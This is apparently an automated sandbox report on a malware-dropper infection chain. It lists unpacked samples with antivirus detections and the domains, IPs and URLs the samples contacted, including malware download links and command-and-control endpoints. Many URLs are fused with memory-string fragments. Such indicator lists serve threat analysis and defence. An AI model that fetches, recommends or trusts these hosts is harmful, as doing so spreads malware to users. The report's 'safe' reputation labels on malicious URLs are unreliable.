      1.3.yevbZfdCqR.exe.5bc4e20.12.unpack100%AviraTR/Patched.Ren.GenDownload File
      1.3.yevbZfdCqR.exe.5b28ec0.54.unpack100%AviraTR/Patched.Ren.GenDownload File
      1.3.yevbZfdCqR.exe.5bc4e20.2.unpack100%AviraTR/Patched.Ren.GenDownload File
      5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.2580e50.3.unpack100%AviraTR/Patched.Ren.GenDownload File
      16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.28.unpack100%AviraHEUR/AGEN.1131354Download File
      26.2.jooyu.exe.390000.0.unpack100%AviraTR/Redcap.ahesaDownload File
      26.2.jooyu.exe.40f110.2.unpack100%AviraTR/Patched.Ren.GenDownload File
      41.2.jfiag3g_gg.exe.400000.0.unpack100%AviraTR/Crypt.ULPM.GenDownload File
      13.0.LPBuRcBvc7urPUzoi5RqTFtn.exe.c6f110.2.unpack100%AviraTR/Patched.Ren.GenDownload File
      21.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.400000.0.unpack100%AviraHEUR/AGEN.1142322Download File
      16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.2.unpack100%AviraHEUR/AGEN.1131354Download File
      13.2.LPBuRcBvc7urPUzoi5RqTFtn.exe.c6f110.7.unpack100%AviraTR/Patched.Ren.GenDownload File
      16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.6.unpack100%AviraHEUR/AGEN.1131354Download File
      35.2.md8_8eus.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      1.3.yevbZfdCqR.exe.4f393c3.7.unpack100%AviraTR/Patched.Ren.GenDownload File
      1.2.yevbZfdCqR.exe.4ee31a0.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      13.0.LPBuRcBvc7urPUzoi5RqTFtn.exe.bf0000.0.unpack100%AviraTR/Redcap.ahesaDownload File
      30.1.MQ5u6_H0cs9EUXsesfNpGUNc.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      13.0.LPBuRcBvc7urPUzoi5RqTFtn.exe.c9d110.3.unpack100%AviraTR/Patched.Ren.GenDownload File
      33.0.jfiag3g_gg.exe.400000.0.unpack100%AviraTR/Crypt.ULPM.GenDownload File
      26.0.jooyu.exe.40f110.1.unpack100%AviraTR/Patched.Ren.GenDownload File
      1.3.yevbZfdCqR.exe.5b65d60.13.unpack100%AviraTR/Patched.Ren.GenDownload File
      6.0.YX7wpjoMI0vZoMwVbFh9XNIC.exe.bf0000.0.unpack100%AviraHEUR/AGEN.1135860Download File
      36.0.jfiag3g_gg.exe.400000.0.unpack100%AviraTR/Crypt.ULPM.GenDownload File
      36.2.jfiag3g_gg.exe.400000.0.unpack100%AviraTR/Crypt.ULPM.GenDownload File
      25.2.file4.exe.6e0000.2.unpack100%AviraTR/Patched.Ren.Gen2Download File
      20.2.gDoWsyv4ZlqhjBKjyfkjR1BY.exe.41bf9a.3.unpack100%AviraTR/Dropper.GenDownload File
      16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.14.unpack100%AviraHEUR/AGEN.1131354Download File
      1.3.yevbZfdCqR.exe.5b02020.5.unpack100%AviraTR/Patched.Ren.GenDownload File
      25.2.file4.exe.6f0000.4.unpack100%AviraTR/Dropper.GenDownload File
      20.1.gDoWsyv4ZlqhjBKjyfkjR1BY.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      1.3.yevbZfdCqR.exe.5aeefe0.17.unpack100%AviraTR/Patched.Ren.GenDownload File
      37.0.svchost.exe.1da29cd0000.4.unpack100%AviraTR/ATRAPS.Gen2Download File
      25.2.file4.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      5.3.ZteJ0k9a2sM9jXcC3SndaipD.exe.2620000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
      25.0.file4.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      35.0.md8_8eus.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      21.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.9e0000.1.unpack100%AviraHEUR/AGEN.1135860Download File
      6.2.YX7wpjoMI0vZoMwVbFh9XNIC.exe.bf0000.0.unpack100%AviraHEUR/AGEN.1135860Download File
      21.0.YX7wpjoMI0vZoMwVbFh9XNIC.exe.9e0000.0.unpack100%AviraHEUR/AGEN.1135860Download File
      29.0.Browzar.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
      26.2.jooyu.exe.43d110.1.unpack100%AviraTR/Patched.Ren.GenDownload File
      26.0.jooyu.exe.390000.0.unpack100%AviraTR/Redcap.ahesaDownload File
      1.3.yevbZfdCqR.exe.5e52f40.20.unpack100%AviraTR/Patched.Ren.GenDownload File
      11.3.oO2a8x5RXTHKygCXkT7syx3J.exe.2670000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
      16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.20.unpack100%AviraHEUR/AGEN.1131354Download File
      16.2.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.1.unpack100%AviraHEUR/AGEN.1131354Download File
      16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.13.unpack100%AviraHEUR/AGEN.1131354Download File
      33.2.jfiag3g_gg.exe.400000.0.unpack100%AviraTR/Crypt.ULPM.GenDownload File
      20.2.gDoWsyv4ZlqhjBKjyfkjR1BY.exe.421b96.1.unpack100%AviraTR/Dropper.GenDownload File
      16.0.BqbASL8ovE3o_gRiKrvwENXN.exe.5f0e50.11.unpack100%AviraHEUR/AGEN.1131354Download File
      13.2.LPBuRcBvc7urPUzoi5RqTFtn.exe.bf0000.6.unpack100%AviraTR/Redcap.ahesaDownload File
      13.2.LPBuRcBvc7urPUzoi5RqTFtn.exe.c9d110.9.unpack100%AviraTR/Patched.Ren.GenDownload File
      26.0.jooyu.exe.43d110.2.unpack100%AviraTR/Patched.Ren.GenDownload File

      Domains

      SourceDetectionScannerLabelLink
      nicepricingsaleregistration.com7%VirustotalBrowse
      jom.diregame.live8%VirustotalBrowse
      email.yg9.me0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://jom.diregame.live:80/m0%Avira URL Cloudsafe
      https://iplis.ru/1G8Fx7.mp3~0%Avira URL Cloudsafe
      http://159.69.20.131/msvcp140.dll0%Avira URL Cloudsafe
      http://136.144.41.133/WW/file1.exeuments0%Avira URL Cloudsafe
      http://136.144.41.152/base/api/getData.phpf=0%Avira URL Cloudsafe
      http://159.69.20.131/vcruntime140.dllYYC:0%Avira URL Cloudsafe
      http://flamkravmaga.com/pub4.exehttp://185.20.227.194/install.exehttps://cdn.discordapp.com/attachme0%Avira URL Cloudsafe
      http://tempuri.org/0%Avira URL Cloudsafe
      http://136.144.41.152/base/api/getData.phpeS0%Avira URL Cloudsafe
      https://d.dirdgame.live/userf/2201/351d2d0bb9a0df4a490dafc033194e7d.exeLMEM0%Avira URL Cloudsafe
      http://159.69.20.131/0%Avira URL Cloudsafe
      http://136.144.41.133/WW/file2.exeC:0%Avira URL Cloudsafe
      http://136.144.41.133/WW/file8.exe100%Avira URL Cloudmalware
      http://136.144.41.133/WW/file7.exeumentsN13eHI1fs1RwfU6rt0L4y8dk.exe0%Avira URL Cloudsafe
      http://136.144.41.133/0%Avira URL Cloudsafe
      https://2makestorage.comidna:0%Avira URL Cloudsafe
      http://136.144.41.152/KB0%Avira URL Cloudsafe
      http://marsdevelopmentsftwr.com/data/data.7z100%Avira URL Cloudmalware
      http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmd0%Avira URL Cloudsafe
      https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css0%URL Reputationsafe
      https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css0%URL Reputationsafe
      https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css0%URL Reputationsafe
      http://uyg5wye.2ihsfa.com/api/?sid=87819&key=00a1b912da62d35571d16217e9d5ff8f0%Avira URL Cloudsafe
      https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370%URL Reputationsafe
      https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370%URL Reputationsafe
      https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370%URL Reputationsafe
      http://136.144.41.133/WW/file8.exeC:0%Avira URL Cloudsafe
      https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b50%URL Reputationsafe
      https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b50%URL Reputationsafe
      https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b50%URL Reputationsafe
      https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy0%Avira URL Cloudsafe
      http://136.144.41.133/WW/file1.exeC:0%Avira URL Cloudsafe
      http://cps.letsencrypt.org00%URL Reputationsafe
      http://cps.letsencrypt.org00%URL Reputationsafe
      http://cps.letsencrypt.org00%URL Reputationsafe
      https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e0%Avira URL Cloudsafe
      https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
      https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
      https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
      http://freeprivacytoolsforyou.xyz/downloads/toolspab2.exe0%Avira URL Cloudsafe
      http://136.144.41.152/base/api/getData.phpM0%Avira URL Cloudsafe
      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
      http://136.144.41.133/WW/file1.exe10%Avira URL Cloudsafe
      https://pki.goog/repository/00%URL Reputationsafe
      https://pki.goog/repository/00%URL Reputationsafe
      https://pki.goog/repository/00%URL Reputationsafe
      http://g-partners.top/stats/remember.php?pub=mixinte&user=user0%Avira URL Cloudsafe
      http://fairsence.com/campaign/?type=err&source=campaign1&pinf1=0%Avira URL Cloudsafe
      http://https://_bad_pdb_file.pdb0%Avira URL Cloudsafe
      http://136.144.41.152/base/api/getData.phpF0%Avira URL Cloudsafe
      https://sndvoices.comhttps://spolaect.infoimage:0%Avira URL Cloudsafe
      http://136.144.41.133/WW/file6.exehttp://136.144.41.133/WW/file7.exe0%Avira URL Cloudsafe
      http://136.144.41.133/WW/file7.exeC:0%Avira URL Cloudsafe
      http://136.144.41.152/base/api/getData.phpq0%Avira URL Cloudsafe
      http://136.144.41.152/base/api/getData.phps0%Avira URL Cloudsafe
      https://blockchain.infoindex0%URL Reputationsafe
      https://blockchain.infoindex0%URL Reputationsafe
      https://blockchain.infoindex0%URL Reputationsafe
      http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
      http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
      http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
      http://136.144.41.133/WW/file4.exe100%Avira URL Cloudmalware
      http://pki.goog/gsr2/GTSGIAG3.crt0)0%URL Reputationsafe
      http://pki.goog/gsr2/GTSGIAG3.crt0)0%URL Reputationsafe
      http://pki.goog/gsr2/GTSGIAG3.crt0)0%URL Reputationsafe
      http://136.144.41.133/server.txt0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      star-mini.c10r.facebook.com
      		157.240.17.35
      		truefalse
        		high
        nicepricingsaleregistration.com
        		89.221.213.3
        		truetrueunknown
        jom.diregame.live
        		104.21.65.45
        		truefalseunknown
        freeprivacytoolsforyou.xyz
        		212.80.219.75
        		truetrue
          		unknown
          cdn.discordapp.com
          		162.159.134.233
          		truefalse
            		high
            iplogger.org
            		88.99.66.31
            		truefalse
              		high
              www.browzar.com
              		139.59.176.201
              		truefalse
                		high
                sergeevih43.tumblr.com
                		74.114.154.22
                		truefalse
                  		high
                  email.yg9.me
                  		198.13.62.186
                  		truetrueunknown
                  ip-api.com
                  		208.95.112.1
                  		truefalse
                    		high
                    uyg5wye.2ihsfa.com
                    		88.218.92.148
                    		truefalse
                      		unknown
                      g-partners.top
                      		138.68.187.227
                      		truetrue
                        		unknown
                        d.dirdgame.live
                        		104.21.59.252
                        		truefalse
                          		unknown
                          iplis.ru
                          		88.99.66.31
                          		truefalse
                            		unknown
                            www.facebook.com
                            		unknown
                            		unknownfalse
                              		high
                              flamkravmaga.com
                              		unknown
                              		unknowntrue
                                		unknown
                                g-partners.in
                                		unknown
                                		unknowntrue
                                  		unknown
                                  pp.exe
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.browzar.com/start/css/ie7.cssfalse
                                      		high
                                      http://159.69.20.131/msvcp140.dllfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://136.144.41.133/WW/file8.exetrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://uyg5wye.2ihsfa.com/api/?sid=87819&key=00a1b912da62d35571d16217e9d5ff8ffalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://freeprivacytoolsforyou.xyz/downloads/toolspab2.exefalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://g-partners.top/stats/remember.php?pub=mixinte&user=usertrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://136.144.41.133/WW/file4.exetrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://136.144.41.133/server.txtfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://assets.tumblr.com/assets/scripts/pre_tumblelog.js?_v=b9f848c06fcba7eaf305d4a7cb7a1b98oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpfalse
                                        		high
                                        https://duckduckgo.com/chrome_newtaboO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.957981451.0000000000B4B000.00000004.00000001.sdmpfalse
                                          		high
                                          https://jom.diregame.live:80/myevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.browzar.com/start/?v=2000uMBrowzar.exe, 0000001D.00000002.1022622220.0000000000854000.00000004.00000020.sdmpfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.957981451.0000000000B4B000.00000004.00000001.sdmpfalse
                                              		high
                                              https://iplis.ru/1G8Fx7.mp3~yevbZfdCqR.exe, 00000001.00000002.754205295.0000000005EB7000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.browzar.com/start/?v=2000....gstBrowzar.exe, 0000001D.00000003.736533690.0000000005D04000.00000004.00000001.sdmpfalse
                                                		high
                                                https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exeLBrowzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpfalse
                                                  		high
                                                  https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exeJyevbZfdCqR.exe, 00000001.00000002.749754909.0000000000FAE000.00000004.00000020.sdmpfalse
                                                    		high
                                                    https://messenger.com/LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.745782059.000000000176F000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://www.browzar.comyevbZfdCqR.exe, 00000001.00000003.658257758.0000000005DE1000.00000004.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000002.993457562.00000000020A0000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://136.144.41.133/WW/file1.exeumentsyevbZfdCqR.exe, 00000001.00000003.650721948.0000000004F72000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://136.144.41.152/base/api/getData.phpf=yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://159.69.20.131/vcruntime140.dllYYC:oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://assets.tumblr.com/client/prod/standalone/blog-network-npf/index.build.css?_v=a6c4ad40cdc663aoO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.746523925.0000000000B26000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exeCyevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpfalse
                                                            		high
                                                            http://flamkravmaga.com/pub4.exehttp://185.20.227.194/install.exehttps://cdn.discordapp.com/attachmeyevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://tempuri.org/YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.967742961.0000000002D71000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://136.144.41.152/base/api/getData.phpeSyevbZfdCqR.exe, 00000001.00000002.753518854.0000000005AE0000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.nirsoft.netjfiag3g_gg.exe, 00000017.00000002.728579676.0000000000197000.00000004.00000001.sdmp, jfiag3g_gg.exe, 00000021.00000002.965805266.000000000019A000.00000004.00000001.sdmp, jfiag3g_gg.exe, 00000024.00000002.970486812.000000000019A000.00000004.00000001.sdmp, jfiag3g_gg.exe, 00000029.00000002.987882908.000000000019A000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://cdn.discordapp.com:80/attachments/855697945679888404/856207959917985862/file3s.bmp4yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://cdn.discordapp.com/attachments/855697945679888404/856835788548603904/file3.bmpLMEMBrowzar.exe, 0000001D.00000002.1025136728.0000000000861000.00000004.00000020.sdmpfalse
                                                                  		high
                                                                  http://www.browzar.com/start/?v=2000thodBrowzar.exe, 0000001D.00000002.1027482877.0000000000879000.00000004.00000020.sdmpfalse
                                                                    		high
                                                                    https://d.dirdgame.live/userf/2201/351d2d0bb9a0df4a490dafc033194e7d.exeLMEMBrowzar.exe, 0000001D.00000002.1031318716.00000000008AA000.00000004.00000020.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exe2yevbZfdCqR.exe, 00000001.00000003.657194848.0000000005EB5000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exeyevbZfdCqR.exe, 00000001.00000003.657194848.0000000005EB5000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.749754909.0000000000FAE000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000002.753660933.0000000005B38000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exe.yevbZfdCqR.exe, 00000001.00000002.753069544.0000000004EB2000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://159.69.20.131/oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.browzar.com/start/?v=2000ww.browzar.com/start/?v=2000d.cookieBrowzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpfalse
                                                                            		high
                                                                            https://cdn.discordapp.com/onesyevbZfdCqR.exe, 00000001.00000003.646781489.0000000005AEC000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://cdn.discordapp.com:80/attachments/856079061931786250/856079337548021790/app.bmpyevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://136.144.41.133/WW/file2.exeC:yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://cdn.discordapp.com:80/attachments/849802777433341954/851833670733266955/jooyu.exeEyevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yp/l/0LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.749546069.0000000001767000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.discordapp.com/attachments/835840016650600461/835848109048987689/004file4.exe, 00000019.00000002.737119021.00000000006E0000.00000040.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://136.144.41.133/WW/file7.exeumentsN13eHI1fs1RwfU6rt0L4y8dk.exeyevbZfdCqR.exe, 00000001.00000003.650285790.0000000004F72000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://turnitin.com/robot/crawlerinfo.html)couldnKyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://136.144.41.133/yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/49k3IgkO4JO.js?_nc_x=Ij3Wp8lg5KzLPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://www.browzar.com/start/?v=2000#EBrowzar.exe, 0000001D.00000003.736533690.0000000005D04000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://2makestorage.comidna:KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://136.144.41.152/KByevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://marsdevelopmentsftwr.com/data/data.7zgDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.965220309.000000000069A000.00000004.00000020.sdmptrue
                                                                                            • Avira URL Cloud: malware
                                                                                            		unknown
                                                                                            http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmdfile4.exe, 00000019.00000000.703183273.000000000040D000.00000002.00020000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.cssmd8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.browzar.com/start/?v=2000tagead/js/adsbygoogle.jsbrowzar.com;iBrowzar.exe, 0000001D.00000002.1014757833.0000000000825000.00000004.00000020.sdmpfalse
                                                                                              		high
                                                                                              https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1eLMEMBrowzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpfalse
                                                                                                		high
                                                                                                https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937md8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://136.144.41.133/WW/file8.exeC:yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmptrue
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://cdn.discordapp.com:80/attachments/855697945679888404/856207959917985862/file3s.bmpyevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5md8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.963209956.0000000000402000.00000040.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://136.144.41.133/WW/file1.exeC:yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://cps.letsencrypt.org0yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266emd8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.cmd8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.963209956.0000000000402000.00000040.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.957981451.0000000000B4B000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://136.144.41.152/base/api/getData.phpMyevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0syevbZfdCqR.exe, 00000001.00000003.647771339.0000000005DE1000.00000004.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000003.704147126.00000000048E0000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      http://136.144.41.133/WW/file1.exe1yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
